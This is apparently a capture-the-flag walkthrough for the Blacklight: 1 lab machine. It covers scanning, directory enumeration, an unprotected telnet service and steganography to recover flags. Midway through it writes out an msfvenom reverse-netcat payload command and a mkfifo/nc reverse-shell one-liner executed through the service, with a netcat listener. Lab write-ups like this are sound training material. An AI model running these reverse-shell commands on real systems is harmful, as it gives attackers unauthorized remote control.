Blacklight: 1 Walkthrough

Lab Environment

Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux

Vulnerable Machine : Blacklight: 1

Let’s start hacking and breach the security of this machine

Scanning Phase : Let’s start with knowing our attacking machine’s ip
      Syntax used : ifconfig
              Results :

Now let’s scan our local network to which attacking machine and vulnerable machine is connected.
    Syntax used : arp-scan --local
    Results :

Enumeration Phase : Now using nmap to scan the services running on ports .
Syntax used : nmap -p- -A -Pn
    Results   : http service is running on port 80 and one port 9072 is open

Now browsing the IP in browser to see the webpage running

Now fired up dirb to reveal the directories
Syntax used : dirb http;//
Results : got something in robots.txt

Now browsing the url of robots.txt in browser  
Results : flag1.txt , blacklight.dict

Now opening the flag1.txt in browser
Syntax used :
Results : value of flag and 9072 the secret is at home

Now tried to open the dictionary file named blacklight.dict
Syntax used :

After all this i tried to make connection on port 9072 with telnet and found that it is unsecured so we don’t need password .
Syntax used : telnet 9072
Results : on getting connected there’s a message displayed i.e type .help for instructions
From help we get to know we can only execute limited commands .

Since it’s a shell so i used a payload of cmd to get reverse shell with netcat
Syntax used : msfvenom -p cmd/unix/reverse_netcat lhost= lport=1337 R
Results : got the raw output of payload

Now , copied the raw output and pasted it into the shell obtained with telnet
Syntax used : .exec mkfifo /tmp/fgxypp; nc 1337 0</tmp/fgxypp | /bin/sh >/tmp/fgxypp 2>&1; rm /tmp/fgxypp
Explanation : .exec is used before the raw output of payload has in the telnet shell it can be clearly seen that .exec is to execute commands

Fired up netcat and got the reverse connection
Syntax used : nc -lvp 1337
Results : got the reverse connection

Syntax used : whoami
Results : root
Explanation : to know which user i am
Now spawning the shell
Syntax used : python  -c ‘import pty; pty.spawn(“/bin/bash”)’

As we know that at the time we opened the flag1.txt we got an message saying that the secret is at home so now it’s time to navigate to home directory and find the secret folder/file
After exploring got the directory named secret which was hidden.
Syntax used to view hidden directories : ls -la

Now entered the secret directory and got one more flag
Syntax used : cd .secret
Results : flag2-inside.jpg
Copied the flag2 file in var/www/html of a victim machine so that i can access it through browser
Syntax used : cp flag2-inside.jpg /var/www/html

Now browsed the victim’s ip with file name at the end
Syntax used :
Results : got one image , saved image and it gave me the hint of using outguess tool as
Out and guess were capitalized

Used outguess to reveal the information inside the image
Syntax used : outguess -r /root/Desktop/flag2-inside.jpg -t flag2.txt
Explanation : r to access the file(on which operation has to be performed) from the location
t is used to write static information in file.
Here i used flag2.txt  as a name to get output in

Here’s the file named flag2.txt

Read the flag
Syntax used : cat flag2.txt
Results : flag2

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